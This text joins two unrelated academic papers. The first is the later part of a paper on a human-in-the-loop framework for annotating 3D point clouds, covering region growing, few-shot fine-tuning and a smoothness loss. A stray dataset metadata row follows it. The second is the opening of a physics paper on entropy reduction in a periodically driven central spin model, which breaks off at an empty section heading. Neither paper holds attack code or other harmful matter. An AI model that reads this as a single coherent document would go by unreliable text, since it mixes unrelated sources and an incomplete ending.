The problem of providing a label of each point in a point cloud has been tackled via a host of fully automatic approaches in the domain of point cloud segmentation \cite{DBLP:journals/corr/abs-1710-07563} \cite{DBLP:journals/corr/abs-1711-09869}. While these approaches are successful in delineating large structures such as buildings, roads and vehicles, they perform poorly on finer details in the 3D models. Besides, most of these approaches use supervised learning methods which in-turn rely on labelled datasets making it a chicken and egg problem.
Thus, most existing datasets \cite{Behley2019ADF} \cite{hackel2017isprs} \cite{Roynard2018ParisLille3DAL} have been annotated via dominantly manual systems to ensure accuracy and to avoid algorithmic biases in the produced datasets. The large investment required in terms of human effort in generating the annotations severely limit both the significance and prevalence of point cloud datasets that are available for the community.
Annotating large scale datasets is a natural use case for fusing human and algorithmic intelligence. Annotations inherently rely on a human definition and are also representative of semantic patterns that can be identified by an algorithm. Thus, we observe an active field of research which seeks to fuse human and algorithmic actors in one overarching framework to aid in annotating datasets. Most notable in the context of point cloud annotation is \cite{Yi:2016:SAF:2980179.2980238} which proposes an active learning framework for region annotations in datasets with repeating shapes. However, this method is limited by allowing for annotating only in certain 2D views the point clouds. Our proposed framework allows for annotation in full 3D thus allowing for finer annotation of the point cloud and the ability to work with less structured real-world point clouds as opposed to relatively noise-free synthetic point clouds.
\begin{figure*}[h]
\centering \includegraphics[width=\textwidth]{pipeline.png}
\caption{
\label{fig:pipeline}
This figure illustrates our pipeline. The first step starts with a partial sparse annotation by a human, followed by a region growing step using 3D geometric cues. We then iterate between few-shot learning using newly available annotations and sparse correction of predictions via human annotator to obtain final segmentation outputs.
}
\end{figure*}
In this work, we propose a human-in-loop learning approach that fuses together manual annotation, algorithmic propagation and capitalises on existing 3D datasets for improving semantic understanding. Our method starts with a partial sparse annotation by a human, followed by a region growing step using 3D geometric cues. We then iterate over the following steps: a) Model fine tuning using newly available annotations b) Model prediction of annotated point cloud c) Sparse correction of predictions via human annotator. Figure \ref{fig:pipeline} gives a snapshot of our annotation approach.
In the next couple of sections we go over our methodology in more details followed by a discussion of our results and future work.
\section{Methodology}
\label{method}
This system is primarily focused on providing an annotation framework to create datasets of point clouds with ground truth semantic labels for each point. For a given point cloud, our method starts with sparse manual annotation and then iterates between two main steps: few-shot learning and manual correction. The manual annotations are provided by marking few representative points for each part to be labelled in the point cloud. These labels are propagated across the point cloud using geometric cues which is used to train the network. The final step involves correcting network mispredictions, which is used to further guide the training process. For the initial point clouds to be annotated, these steps are iterated over multiple times but as more point clouds are annotated using this framework, the method converges to relying only on the initial set of manual annotations (or no annotations at all) to make more accurate annotation predictions.
\subsection{Manual Annotations and Region Growing}
The decomposition of a point cloud into semantically meaningful parts/regions is an open-ended problem as the concept of an annotation is context dependent \cite{segmentation_eval}. Owing to this ambiguity, the first step of our annotation pipeline is to allow the user to determine the number of possible classes that exist in the segmentation of point clouds in the dataset. The framework of annotation, learning and correction also provides the flexibility to have different number of segmentations for the same point cloud allowing for creating datasets with varying granularities of segmentation as in \cite{DBLP:journals/corr/abs-1812-02713}. The user initially provides labels to a point or a small group of points for each of the classes in the point cloud. Thereafter, human provided annotations are automatically propagated to few unlabelled points by exploiting geometry of the point cloud. We believe that relying on geometric attributes like surface normals, smoothness, curvature and color (if available) would simplify the goal of segmentation as decomposing the point cloud into locally smooth regions enclosed by sharp boundaries. These segmentations also often end up matching with human perception and can be used as an initial training example for the learning pipeline. For this reason, we use cues like surface normals to group spatially close points as belonging to the same region. We also experimented with color based region growing, K-Nearest Neighbour (KNN) and Fixed Distance Neighbor (FDN) \cite{nearest_neighbor} based region growing methods which end up being faster than surface normal based region growing methods without compromising on accuracy of the overall system. Region growing approaches reduce annotator overhead of selecting multiple points by giving a geometry aware selection mechanism.
\subsection{Few-shot Learning}
The goal of few-shot learning optimization in this context is to rely on minimal human supervision to improve segmentation accuracy. It is for this reason that we obtain the initial set of ground truth labels for training from manual annotations and use region growing methods for further supervision. We use very conservative thresholds for the region growing methods to avoid noisy ground truth labels. We also use a pre-trained network to bootstrap the training process and reduce the amount of human effort in correction phase.
The pre-trained network to be used in this system can be any segmentation network, pre-trained on an existing dataset in a similar domain. For our experiments, we used PointNet \cite{pointnet} pre-trained on ShapeNet \cite{DBLP:journals/corr/ChangFGHHLSSSSX15} to bootstrap the training.
We fine-tune the base network iteratively using limited supervision in the form of annotation and correction provided by human in the loop. We also dynamically adapt the base network depending on the number of segmentation classes in the point cloud. The initial seed acquired from manual annotation and region growing gives a partially labelled point cloud that is used to fine-tune the base network. The model leverages the prior semantic understanding in the pre-trained network alongside the supervision of partially labelled points in the entire point cloud to provide meaningful segmentations in the first stage. We rely on the human annotators to compensate for network mispredictions by assigning new label to points with incorrect segmentations. Subsequently, we fine-tune further with all the labels (initial seed + corrections) that the human annotator has provided so far. This process continues until all points are labelled correctly - as verified by the human annotator. At this stage, we retrain the network with all the points in the point cloud - which allows us propagate these labels to newer point clouds of the same shape in the dataset. Figure \ref{fig:FineTuningExample} illustrates a sample of the results from this loop of user feedback and finetuning.
\begin{figure}[h]
\centering \includegraphics[width=0.9\columnwidth]{FineTune.png}
\caption{
\label{fig:FineTuningExample}
Figure to show effects of few-shot learning in 3 class segmentation of a chair. From left to right i) Manual annotation with region growing ii) Predictions of the network after fine tuning. Notice the spillage of labels at the boundary which is resolved after correction and final learning step iii) Partially corrected point cloud from the user iv) Final prediction after fine tuning with corrections
}
\end{figure}
\subsubsection{Smoothness Loss}
We formulate segmentation as a per-point classification problem similar to the setup of PointNet \cite{pointnet} including global and local feature aggregation. We also use transformation network to ensure that the network predictions are agnostic to rigid transformations of point cloud. We further leverage smoothness of the shape to favor regions that are compact and continuous. Overall, the network loss can be formulated as:
\begin{equation}
\mathcal{L} = L_{segment} + \alpha L_{transform} + \beta L_{smooth}
\end{equation}
We use \textit{smoothness loss} in addition to the segmentation cross entropy loss to encourage adjacent points to have similar labels. The smoothness loss is formulated as follows: \\
\begin{equation}
L_{smooth} = \sum_{i=1}^{N}\sum_{j=i}^{N}D_{KL} \left( p_i \middle\| p_j \right) e^{-\frac{\sqrt{\left\Vert (pos_{p_i} - pos_{p_j})\right\Vert_2^2}}{\sigma}}
\end{equation}
The smoothness term is computed as pairwise \textit{Kullback-Leibler} (KL) divergence of predictions exponentially weighted on eucledean distance between any two points in the point cloud. $\sigma$ is set to the variance of pairwise distance between all points to capture point cloud density in the loss term. The smoothness term in this context is expected to capture and minimize relative entropy between neighboring points in the point cloud. This term ends up dominating total loss if nearby points have divergent logits. Points which are far from each other end up contributing very little to the overall loss term, regardless of their logits owing to high pairwise distances between them.
Figure \ref{fig:SmoothnessLossExample} shows a qualitative example for the effect of the smoothness loss.
\begin{figure}[h]
\centering \includegraphics[width=0.8\columnwidth]{SmoothnessLoss.png}
\caption{
\label{fig:SmoothnessLossExample}
Illustration to show effect of the smoothness loss. From left to right i) Manual annotation with region growing ii) Predictions of the network without smoothness loss iii) Network predictions with smoothness loss
}
\end{figure}
The first stage of segmentation output requires less human cognitive effort for correction if the smoothening term is added to loss computation as it has been observed through our experiments. The weights of smoothness loss term is subsequently dropped after getting further supervision from the user.
\section{Results}
\label{results}
In this section, we discuss the experimental setup to validate the effectiveness of our framework by investigating its utility to create new datasets against completely manual or semi-automatic methods. Additionally, we have also investigated the improvement in annotation efficiency as the total number of annotated point clouds increase.
\textbf{Dataset}. To test the robustness and ease of adapting to our framework, we aim to use it to create a massive and diverse dataset of synthetic and reconstructed point clouds. Towards this goal, we have created part segmentations of reconstructed point clouds taken from A Large Dataset of Object Scans \cite{Vladlen}. Qualitative results for segmentations are shown in Figure \ref{fig:VladenDataset}. The framework showed remarkable improvement in human annotation efficiency as measured in number of clicks required for manual annotation and correction which is discussed in subsequent parts of this section.
\begin{figure}[h]
\centering \includegraphics[width=0.8\columnwidth]{new_dataset.png}
\caption{
\label{fig:VladenDataset}
Qualitative results for part segmentation on reconstructed point clouds from Large Dataset of Object Scans \cite{Vladlen}. The results are shown for segmentation of noisy shapes in potted plant and chair class into two and three classes respectively using our framework.
}
\end{figure}
\textbf{Granularity}. The framework also provides the flexibility to annotate with different number of classes for the same shape. The user selects sparse points for each of the classes in the first stage and this information is dynamically incorporated in the training process by re-initializing the last layer to accommodate different number of classes. Qualitative segmentation outputs are illustrated in Figure \ref{fig:chair}.
\begin{figure}[h]
\centering \includegraphics[width=0.8\columnwidth]{chair.png}
\caption{
\label{fig:chair}
Qualitative results for part segmentation on the same shape with different granularities.
}
\end{figure}
\subsection{Annotation Efficiency Improvements}
Existing semi-supervised methods \cite{Yi:2016:SAF:2980179.2980238} use amount of supervision and accuracy as evaluation metrics to measure performance. We follow suit and compare the amount of supervision needed to completely annotate a point cloud in our framework as opposed to completely manual methods. In Table \ref{table1} we compare the number of clicks by the annotator required in our framework compared to a naive nearest neighbour painting based manual approach.
\begin{table}
\caption{Average number of clicks taken to annotate point clouds with varying granularities in terms of number of parts for the same shape. We notice a significant reduction in number of clicks in comparison to manual methods and even our method without the smoothness constraint.}
\label{table1}
\includegraphics[width=\linewidth]{table.png}
\end{table}
With subsequent complete annotations of point clouds coming from the same dataset, we expect a reduction in the human supervision needed in order to have a scalable system. As we incrementally train the network on a progressively complete annotation of the point clouds, the model adapts to the properties of the new domain represented by the dataset. Thus, we are able to predict a more accurate segmentation of the point cloud in the initial iterations thereby cutting down on the total number of user correction steps needed. This is validated via our experiments as illustrated in Figure \ref{fig:MulitplePointClouds}.
\begin{figure}[h]
\centering \includegraphics[width=0.8\columnwidth]{graph.png}
\caption{
\label{fig:MulitplePointClouds}
Number of clicks taken to annotate subsequent point clouds using our framework. We see a reduction in number of clicks needed as more point clouds of the new dataset are annotated.
}
\end{figure}
While previous works measure the amount of user supervision based on invested time, we focused on quantifying supervision via number of clicks. Through our experiments we observed that time taken to annotate a point clouds reduces with the number of point clouds annotated even in completely manual methods. This is because a large part of the time taken in annotating goes in manipulating the point clouds on a 2D tool. As the annotators label more point clouds, they get more accustomed to the tool and the relevant manipulation interactions, reducing the overall time they need in annotating subsequent point clouds. On the other hand, the number of clicks needed depend more on complexity of the point cloud and the number of classes to be annotated instead of the number of previous point clouds annotated in the system making it a suitable metric for evaluation.
\section{Conclusion}
We provide a scalable interactive learning framework that can be used to annotate large point cloud datasets. By fusing together three different cues (human annotations, learnt semantic similarity and geometric consistencies) we are able to obtain accurate annotations with fewer human interactions. We note that while the number of clicks are a useful proxy for the quantum of human interaction needed, it is also important to study the amount of time needed for each click as it adds to overall human time investment needed in annotating a dataset. Significant leaps in reducing the cognitive overload for a human annotator can be made by replacing 2D user interfaces with spatial user interfaces facilitated via virtual reality systems as they make point cloud manipulation and visualization more natural of the annotator.
| 2024-02-18T23:40:09.417Z | 2019-06-12T02:08:33.000Z | algebraic_stack_train_0000 | 1,488 | 2,739 |
|
proofpile-arXiv_065-7310 | \section*{Abstract}
{\bf
Non-equilibrium physics is a particularly fascinating field of
current research. Generically, driven systems are gradually heated up
so that quantum effects die out. In contrast, we show that
a driven central spin model including
controlled dissipation in a highly excited state allows us
to distill quantum coherent states, indicated by a substantial
reduction of entropy; the key resource is the commensurability
between the periodicity of the pump pulses and the internal processes.
The model is experimentally accessible
in purified quantum dots or molecules with unpaired electrons.
The potential of preparing and manipulating coherent states
by designed driving potentials is pointed out.
}
\vspace{10pt}
\noindent\rule{\textwidth}{1pt}
\tableofcontents\thispagestyle{fancy}
\noindent\rule{\textwidth}{1pt}
\vspace{10pt}
\section{Introduction}
\label{sec:introduction}
Controlling a quantum mechanical system in a coherent way is one of
the long-standing goals in physics. Obviously, coherent control is
a major ingredient for handling quantum information. In parallel,
non-equilibrium physics of quantum systems
is continuing to attract significant interest.
A key issue in this field is to manipulate systems in time
such that their properties can be tuned and changed
at will. Ideally, they display properties qualitatively different from
what can be observed in equilibrium systems.
These current developments illustrate the interest in
understanding the dynamics induced by time-dependent Hamiltonians
$H(t)$.
The unitary time evolution operator $U(t_2,t_1)$ induced by $H(t)$
is formally given by
\begin{equation}
U(t_2,t_1) = {\cal T}\exp\left(-i\int_{t_1}^{t_2}H(t)dt\right)
\end{equation}
where ${\cal T}$ is the time ordering operator. While the explicit
calculation of $U(t_2,t_1)$ can be extremely difficult it is obvious
that the dynamics induced by a time-dependent Hamiltonian
maps quantum states at $t_1$ to quantum states at $t_2$
bijectively and conserves the mutual scalar products. Hence, if initially
the system is in a mixed state with high entropy $S>0$ it stays in a
mixed state for ever with exactly the same entropy.
No coherence can be generated in this way even for a
complete and ideal control of $H(t)$ in time.
Hence, one has to consider open systems.
The standard way to generate a single state is to bring the system of interest
into thermal contact with a cold system. Generically,
this is an extremely slow process. The targeted quantum states
have to be ground states of some given system.
Alternatively, optical pumping in general and laser cooling in particular \cite{phill98} are well
established techniques to lower the entropy of microscopic systems
using resonant pumping and spontaneous decay. Quite recently, engineered
dissipation has been recognized as a means to generate
targeted entangled quantum states in small \red{\cite{witth08,verst09,vollb11}}
and extended systems \cite{kraus08,diehl08}. Experimentally, entanglement
has been shown for two quantum bits
\cite{lin13,shank13} and for two trapped mesoscopic cesium clouds \cite{kraut11}.
In this article, we show that periodic driving can have a quantum
system converge to coherent quantum states if an intermediate, highly
excited and decaying state is involved. The key aspect is
the commensurability of the \red{period of the pump pulses to the
time constants of the internal processes, here Larmor precessions}.
This distinguishes our proposal from established optical pumping
protocols. The completely disordered initial mixture can
be made almost coherent. The final mixture only
has an entropy $S\approx k_\text{B}\ln2$ corresponding to a mixture of
two states.
An appealing asset is that once the driving is switched off
the Lindbladian decay does not matter anymore
and the system is governed by Hamiltonian dynamics only.
The focus of the present work
is to exemplarily demonstrate the substantial reduction of entropy in
a small spin system
subject to periodic laser pulses. The choice of system is motivated
by experiments on the electronic spin in quantum dots interacting with
nuclear spins
\cite{greil06a,greil07b,petro12,econo14,beuge16,jasch17,scher18,klein18}.
The model studied is also applicable
to the electronic spin in molecular radicals \cite{bunce87}
or to molecular magnets, see Refs.\ \cite{blund07,ferra17,schna19}.
In organic molecules the spin
bath is given by the nuclear spins of the hydrogen nuclei
in organic ligands.
\section{Model}
\label{sec:model}
The model comprises a central, electronic spin $S=1/2$ which is
coupled to nuclear spins
\begin{equation}
\label{eq:hamil_spin}
H_\text{spin} = H_\text{CS} + H_\text{eZ} + H_\text{nZ}
\end{equation}
where $H_\text{eZ}=h S^x$ is the electronic Zeeman term with
$h=g\mu_\text{B} B$ ($\hbar$ is set to unity
\red{here and henceforth) with the gyromagnetic factor
$g$, the Bohr magneton $\mu_\text{B}$,
the external magnetic field $B$ in $x$-direction and the $x$-component $S^x$
of the central spin. The nuclear Zeeman term is given by
$H_\text{nZ} = z h \sum_{i=1}^N I^x_i$
where $z$ is the ratio of the nuclear $g$-factor multiplied by
the nuclear magneton and their electronic counterparts
$g_\text{nuclear}\mu_\text{nuclear}/(g\mu_\text{B})$.
The operator $I^x_i$ is the $x$-component of the nuclear spin $i$.
For simplicity we take $I=1/2$ for all nuclear spins.}
Due to the large nuclear mass, the factor $z$ is of the
order of $10^{-3}$, but in principle other $z$-values can be studied as well,
\red{see also below}.
In the central spin part $H_\text{CS}=\vec{S}\cdot\vec{A}$ the
\red{so-called Overhauser field $\vec{A}$ results from
the combined effect of all nuclear spins each of which is
interacting via the hyperfine coupling $J_i$ with} the central spin
\begin{equation}
\vec{A} = \sum_{i=1}^N J_i \vec{I}_i.
\end{equation}
\red{If the central spin results from an electron the
hyperfine coupling is a contact interaction at the location
of the nucleus stemming from relativistic corrections to the
non-relativistic Schr\"odinger equation with a Coulomb potential.
It is proportional to the
probability of the electron to be at the nucleus, i.e., to the
modulus squared of the electronic wave function \cite{schli03,coish04}. Depending on
the positions of the nuclei and on the shape of the wave function
various distributions of the $J_i$ are plausible. A
Gaussian wave function in one dimension implies
a parametrization by a Gaussian while in two dimensions
an exponential parametrization is appropriate \cite{farib13a,fause17a}
distribution. We will first use a uniform distribution for simplicity
and consider the Gaussian and exponential case afterwards.}
Besides the spin system there is an important intermediate state
given by a single trion state $\ket{\mathrm{T}}$ \red{consisting of the
single fermion providing the central spin bound to an
additional exciton. This trion is polarised in $z$-direction
at the very high energy $\varepsilon$ ($\approx 1$ eV).
The other polarisation exists as well, but using circularly
polarised light it is not excited. A Larmor precession of
the trion is not considered here for simplicity.
Then,} the total Hamiltonian reads
\begin{equation}
H = H_\text{spin} + \varepsilon \ket{\mathrm{T}}\bra{\mathrm{T}}.
\end{equation}
The laser pulse is taken to be very short as in experiment
where its duration $\tau$ is of the order of picoseconds. Hence, we
describe \red{its effect by a unitary time evolution operator
$\exp(-i\tau H_\text{puls})=U_\text{puls}$} which excites the $\ket{\uparrow}$
state of the central spin to the trion state or de-excites it
\begin{equation}
\label{eq:puls}
U_\text{puls} = c^\dag + c +\ket{\downarrow} \bra{\downarrow}.
\end{equation}
where $c:=\ket{\uparrow}\bra{\mathrm{T}}$ and
$c^\dagger:=\ket{\mathrm{T}}\bra{\uparrow}$.
\red{This unitary operator happens to be hermitian as well, but this
is not an important feature.
One easily verifies $U_\text{puls}U_\text{puls}^\dag=\mathbb{1}$.}
Such pulses are applied in long periodic trains lasting seconds and minutes.
The repetition time between two consecutive pulses is ${T_\mathrm{rep}}$ of the
order of 10 ns.
The decay of the trion is described by the Lindblad equation
for the density matrix $\rho$
\begin{equation}
\label{eq:lind}
\partial_t \rho(t) = -i[H,\rho] - \gamma (c^\dag c\rho + \rho c^\dag c- 2c\rho c^\dag)
\end{equation}
where the prefactor $\gamma>0$ of the dissipator term \cite{breue06}
defines the decay rate. The corresponding process with $c$ and $c^\dag$
swapped needs not be included because its decay rate is smaller
by $\exp(-\beta\varepsilon)$, i.e., it vanishes for all physical purposes.
\red{We emphasize that we deal with an open quantum system by virtue of
the Lindblad dynamics in \eqref{eq:lind}.
Since the decay of the trion generically implies the emission of
a photon at high energies
the preconditions for using Lindblad dynamics are perfectly met \cite{breue06}.}
\section{Mathematical Properties of Time Evolution}
\label{sec:math-proper}
The key observation is that the dynamics from just before the $n$th pulse
at $t=n{T_\mathrm{rep}} -$ to just before the $n+1$st pulse at $t=(n+1){T_\mathrm{rep}} -$
is a \emph{linear} mapping $M: \rho(n{T_\mathrm{rep}}-) \rightarrow \rho((n+1){T_\mathrm{rep}}-)$ which
does not depend on $n$. Since it is
acting on operators one may call it a superoperator.
Its matrix form is derived explicitly in Appendix \ref{app:matrix}.
If no dissipation took place ($\gamma=0$) the
mapping $M$ would be unitary. But in presence of the dissipative trion decay
it is a general matrix with the following properties:
\begin{enumerate}
\item
The matrix $M$ has an eigenvalue $1$ which may be degenerate.
If the dynamics of the system takes place in $n$ separate
subspaces without transitions between them the degeneracy
is at least $n$.
\item
All eigenoperators to eigenvalues different from 1 are traceless.
\item
At least one eigenoperator to eigenvalue 1 has a finite trace.
\item
The absolute values of all eigenvalues of $M$ are not larger
than 1.
\item
If there is a non-real eigenvalue $\lambda$ with eigenoperator $C$,
the complex conjugate $\lambda^*$ is also an eigenvalue with eigenoperator
$C^\dag$.
\item
The eigenoperators to eigenvalues 1 can be scaled to be
hermitian.
\end{enumerate}
While the above properties can be shown rigorously, see Appendix \ref{app:properties},
for any Lindblad evolution,
the following ones are observed numerically in the analysis of the
particular model \eqref{eq:lind} under study here:
\begin{itemize}
\item[(a)]
The matrix $M$ is diagonalizable; it does not require a Jordan normal form.
\item[(b)]
For pairwise different couplings $i\ne j\Rightarrow J_i\ne J_j$ the
eigenvalue $1$ is non-degenerate.
\item[(c)]
The eigenoperators to eigenvalue 1 can be scaled to be hermitian and non-negative.
In the generic, non-degenerate case we denote the properly scaled eigenoperator
$V_0$ with $\text{Tr}(V_0)=1$.
\item[(d)]
No eigenvalue $\neq 1$, but with absolute value 1, occurs,
i.e., all eigenvalues different from 1 are smaller than 1 in absolute value.
\item[(e)]
Complex eigenvalues and complex eigenoperators do occur.
\end{itemize}
The above properties allow us to understand what happens in experiment
upon application of long trains of pulses corresponding
to $10^{10}$ and more applications of $M$. Then it is safe to conclude that all
contributions from eigenoperators to eigenvalues smaller than 1 have died out
completely. Only the (generically) single eigenoperator $V_0$ to eigenvalue 1
is left such that
\begin{equation}
\lim_{n\to\infty} \rho(n{T_\mathrm{rep}}-) = V_0.
\end{equation}
The quasi-stationary state after long trains of pulses is given by $V_0$
\footnote{We use the term `quasi-stationary' state
because it is stationary only if we detect it stroboscopically at the
time instants $t=n{T_\mathrm{rep}}-$.}.
This observation simplifies the calculation of the long-time limit
greatly compared to previous quantum mechanical studies
\cite{econo14,beuge16,beuge17,klein18}.
One has to compute the eigenoperator of $M$ to
the eigenvalue 1. Below this is performed by diagonalization of $M$ which
is a reliable approach, but restricted to small systems $N\lessapprox6$.
We stress that no complete diagonalization is required to know $V_0$
because only the eigenoperator to the eigenvalue 1 is needed.
Hence we are optimistic that further computational improvements are possible.
If, however, the speed of convergence is of interest more information on the
spectrum and the eigenoperators of $M$ is needed, see also Sect.\ \ref{sec:convergence}.
\section{Results on Entropy}
\label{sec:entropy}
It is known that in pulsed quantum dots
nuclear frequency focusing occurs (NFF) \cite{greil06a,greil07b,evers18}
which can be explained by a
significant change in the distribution of the Overhauser field
\cite{petro12,econo14,beuge16,beuge17,scher18,klein18} which is Gaussian
initially. This distribution
develops a comb structure with equidistant spikes. The difference $\Delta A_x$
between consecutive spikes is such that it corresponds to a full additional revolution
of the central spin ${T_\mathrm{rep}} \Delta A_x=2\pi$. A comb-like
probability distribution is more structured and contains more information
than the initial featureless Gaussian. For instance, the entropy reduction
of the Overhauser field distributions computed
in Ref.\ \cite{klein18}, Fig.\ 12, relative to the initial Gaussians is
$\Delta S =-0.202k_\text{B}$ at $B=0.93$T and $\Delta S =-0.018k_\text{B}$ at $B=3.71$T.
Hence, NFF decreases the entropy, but only slightly for large spin
baths. This observation inspires us to
ask to which extent continued pulsing can reduce entropy
and which characteristics the final state has.
Inspired by the laser experiments on quantum dots \cite{greil06a,greil07b,evers18}
we choose an (arbitrary) energy unit $J_\text{Q}$ and thus $1/J_\text{Q}$, \red{recalling
that we have set $\hbar=1$},
as time unit which can be assumed to be of the order of 1ns. The repetition time
${T_\mathrm{rep}}$ is set to $4\pi/J_\text{Q}$ which is
on the one hand close to the experimental values where ${T_\mathrm{rep}}=13.2\text{ns}$ and
on the other hand makes it easy to recognize
resonances, see below. The trion decay rate is set to $2\gamma=2.5 J_\text{Q}$
to reflect a trion life time of $\approx 0.4\red{\text{ns}}$. The bath size is restricted
to $N\in\{1,2,\ldots,6\}$, but still allows us to draw fundamental conclusions
and to describe electronic spins coupled to hydrogen nuclear spins in small
molecules \cite{bunce87,blund07,ferra17,schna19}.
The individual couplings $J_i$ are chosen to be distributed according to
\begin{equation}
\label{eq:equidistant}
J_i = J_\text{max}(\sqrt{5}-2)\left(\sqrt{5}+2({i-1})/({N-1})\right),
\end{equation}
which is a uniform distribution between $J_\text{min}$ and $J_\text{max}$ with
$\sqrt{5}$ inserted to avoid accidental commensurabilities \red{of the
different couplings $J_i$}. \red{The value $J_\text{min}$
results from $J_i$ for $i=1$.
Other parametrizations are motivated by the shape of the electronic wave
functions \cite{merku02,schli03,coish04}.}
Results for a frequently used exponential parameterization \cite{farib13a}
\begin{equation}
\label{eq:expo}
J_i = J_\text{max}\exp(-\alpha(i-1)/(N-1))
\end{equation}
with $\alpha\in\{0.5, 1\}$ and for a Gaussian parametrization,
motivated by the electronic wave function in quantum dots \cite{coish04},
\begin{equation}
\label{eq:gaus}
J_i = J_\text{max}\exp(-\alpha[(i-1)/(N-1)]^2).
\end{equation}
are given in the next section and in Appendix \ref{app:other}.
\red{For both parametrizations the minimum value $J_\text{min}$ occurs for $i=N$
and takes the value $J_\text{min}=J_\text{max}\exp(-\alpha)$.}
\begin{figure}[htb]
\centering
\includegraphics[width=0.60\columnwidth]{fig1a}
\includegraphics[width=0.59\columnwidth]{fig1b}
\caption{(a) Residual entropy of the limiting density matrix $V_0$ obtained after
infinite number of pulses vs.\ the applied magnetic field for
$J_\text{max}=0.02J_\text{Q}$ and $z=1/1000$; 1 Tesla corresponds roughly to $50J_\text{Q}$.
Resonances of the electronic spin occur every
$\Delta h=0.5J_\text{Q}$; resonances of the nuclear spins occur every $\Delta h = 500J_\text{Q}$.
The blue dashed line depicts an offset of $\Delta h=\pmJ_\text{max}/(2z)$ from the nuclear resonance.
(b) Zooms into intervals of the magnetic field where the lowest entropies
are reached. The blue dashed lines depict an offset of $\Delta h =\pm A_\text{max}$ from the
electronic resonance.}
\label{fig:overview}
\end{figure}
Figure \ref{fig:overview} displays a generic dependence on the external
magnetic field $h=g\mu_\text{B}B_x$ of the entropy of the limiting density
matrix $V_0$ obtained after infinite number of pulses.
Two nested resonances of the Larmor precessions
are discernible: the central electronic spin resonates for
\begin{equation}
\label{eq:res-central}
h{T_\mathrm{rep}} = 2\pi n, \qquad n\in\mathbb{Z}
\end{equation}
\red{where $n$ is the number of Larmor revolutions that fit
into the interval ${T_\mathrm{rep}}$ between two pulses. This means that for an
increase of the magnetic field from $h$
to $h+\Delta h$ with $\Delta h=2\pi/{T_\mathrm{rep}}$ the
central spin is in the same state before the pulse as it was
at $h$.}
\red{The other resonance is related to the Larmor precession of
the nuclear bath spins
which leads to the condition
\begin{equation}
\label{eq:res-bath}
zh{T_\mathrm{rep}}=2\pi n', \qquad n'\in\mathbb{Z}
\end{equation}
where $n'$ indicates the number of Larmor revolutions of the nuclear spins
which fit between two pulses. Upon increasing the magnetic field $h$,
the nuclear spins are in the same state before the next pulse
if $h$ is changed to $h+\Delta h$ with $\Delta h=2\pi/(z{T_\mathrm{rep}})$.}
\red{But the two resonance conditions \eqref{eq:res-central} and \eqref{eq:res-bath}
for the central spin and for the bath spins apply precisely as given only without
coupling between the spins. The coupled system displays important shifts. The
nuclear resonance appears to be shifted by $z\Delta h \approx \pm J_\text{max}/2$,
see right panel of Fig.\ \ref{fig:overview}(a). The explanation is that the dynamics of
the central spin $S=1/2$ creates an additional magnetic field
\red{similar to a Knight shift} acting on each nuclear spin of the
order of $J_i/2$ which is estimated by $J_\text{max}/2$. Further support \red{of the
validity of this} explanation is given in Appendix \ref{app:shift}.}
The electronic resonance is shifted by
\begin{equation}
\label{eq:over-shift}
\Delta h = \pmA_\text{max}
\end{equation}
where $A_\text{max}$ is the \red{maximum possible value of the}
Overhauser field given by $A_\text{max}:=(1/2)\sum_{i=1}^N J_i$
for maximally polarized bath spins. This is shown in the right
panel of Fig.\ \ref{fig:overview}(b).
\red{Fig.\ \ref{fig:overview} shows that the effect of the
periodic driving on the
entropy strongly depends on the precise value of the magnetic field.
The entropy reduction is largest \emph{close} to the central resonance \eqref{eq:res-central}
and to the bath resonance \eqref{eq:res-bath}. This requires that both
resonances must be approximately commensurate. In addition, the \emph{precise} position of
the maximum entropy reduction depends on the two above shifts, the approximate Knight shift and
the shift by the maximum Overhauser field \eqref{eq:over-shift}.}
We pose the question to
which extent the initial entropy of complete disorder
$S_\text{init}=k_\text{B}(N+1)\ln2$ (in the figures and henceforth
$k_\text{B}$ is set to unity) can be reduced by commensurate
periodic pumping.
The results in Fig.\ \ref{fig:overview} clearly show that remarkably low
values of entropy can be reached. The residual value of $S\approx 0.5k_\text{B}$
in the minima of the right panel of Fig.\ \ref{fig:overview}(b) corresponds
to a contribution of less than two states ($S=\ln2k_\text{B} \approx 0.7k_\text{B}$) while initially
16 states were mixed for $N=3$ so that the initial entropy is
$S_\text{init}=4\ln2k_\text{B}\approx2.77k_\text{B}$.
This represents a remarkable distillation of coherence.
\begin{figure}[htb]
\centering
\includegraphics[width=0.60\columnwidth]{fig2}
\caption{(a) Residual entropy of the limiting density matrix $V_0$
for various bath sizes; other parameters as in Fig.\ \ref{fig:overview}.
The dashed lines indicate the shifts of the electronic
resonance by $-A_\text{max}$. (b) Corresponding normalized polarization of the spin bath
in the external field direction, i.e.\ the $x$-direction.}
\label{fig:size-mag}
\end{figure}
Hence, we focus on the minima and in particular on the
left minimum. We address the question whether the
distillation of coherence still works for larger systems.
Unfortunately,
the numerical analysis cannot be extended easily due to the
dramatically increasing dimension $D= 2^{2(N+1)}$ because
we are dealing with the Hilbert space of density matrices of the spin bath
and the central spin. Yet a
trend can be deduced from results up to $N=6$ displayed in
Fig.\ \ref{fig:size-mag}(a). The entropy reduction per $N+1$ spins is
$-0.58k_\text{B}$ for $N=3$, $-0.57k_\text{B}$ for $N=4$, $-0.55k_\text{B}$ for $N=5$,
and $-0.52k_\text{B}$ for $N=6$. The reduction is substantial, but
slowly decreases with system size. Presently, we cannot know the behavior for
$N\to\infty$. The finite value $\approx-0.2k_\text{B}$ found in the semiclassical
simulation \cite{scher18,klein18} indicates that the effect persists for
large baths. In Appendix \ref{app:other},
results for the couplings defined in \eqref{eq:expo} or in \eqref{eq:gaus}
are given which corroborate our finding. The couplings may be rather close to each
other, but not equal. It appears favorable that the spread of couplings
is not too large.
Which state is reached in the minimum
of the residual entropy? The decisive clue is provided by the lower panel
Fig.\ \ref{fig:size-mag}(b) displaying the polarization of the spin bath.
It is normalized such that its saturation value is unity.
Clearly, the minimum of the residual entropy coincides with the maximum
of the polarization. The latter is close to its saturation value though
not quite with a minute decrease for increasing $N$. This tells us that
the limiting density matrix $V_0$ essentially corresponds to the polarized
spin bath. The central electronic spin is also almost perfectly polarized
(not shown), but in $z$-direction. These observations clarify the
state which can be retrieved by long trains of pulses.
Additionally, Fig.\ \ref{fig:size-mag}(b) explains the shift of the
electronic resonance. The polarized spin bath renormalizes the external
magnetic field by (almost) $\pmA_\text{max}$. To the left of the resonance, it enhances
the external field ($+A_\text{max}$) while the external field is effectively reduced
($-A_\text{max}$) to the right of the resonance. Note that an analogous direct explanation
for the shift of the nuclear resonance in the right panel of Fig.\
\ref{fig:overview} is not valid. The computed polarization of the
central spin points in $z$-direction and thus does not shift the external
field.
\section{Results on Convergence}
